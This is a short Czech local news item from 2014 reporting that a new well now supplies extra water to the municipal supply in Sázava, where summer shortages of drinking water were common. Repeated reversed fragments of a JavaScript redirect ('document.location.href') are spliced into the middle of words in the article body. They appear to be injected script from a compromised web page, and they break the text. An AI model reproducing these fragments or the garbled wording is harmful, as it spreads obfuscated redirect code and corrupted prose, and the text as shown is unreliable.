vodovod, vrt
Rainbow page separator

Obecní vodovod posílil nový vrt

Čtvrtek, 9. října 2014

Sázava / Několik kubíků vody denně je do obecního vodovodu přidáváno prostřednictvím nového hydrogeologického vrtu, který byl nedávno po vybavení čerpadlem a ostatním potřebným technickým zařízením a propojením do stávající sběrné studny zkolaudován v Sázavě.
Došlo tím k posílení zásobování veřejného vodovodu, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože v minulých letech, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zejména v období letního sucha, v obci nezřídka býval nedostatek pitné vody.
Velké výkyvy v odběru vody z obecního vodovodu bývají v letních měsících zaznamenávány obvykle několikrát. Nejčastěji se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to týká napouštění bazénů u rodinných domů s příchodem letních prázdnin a zalévání zahrad při dlouhodobě panujících parnech bez dešťových srážek.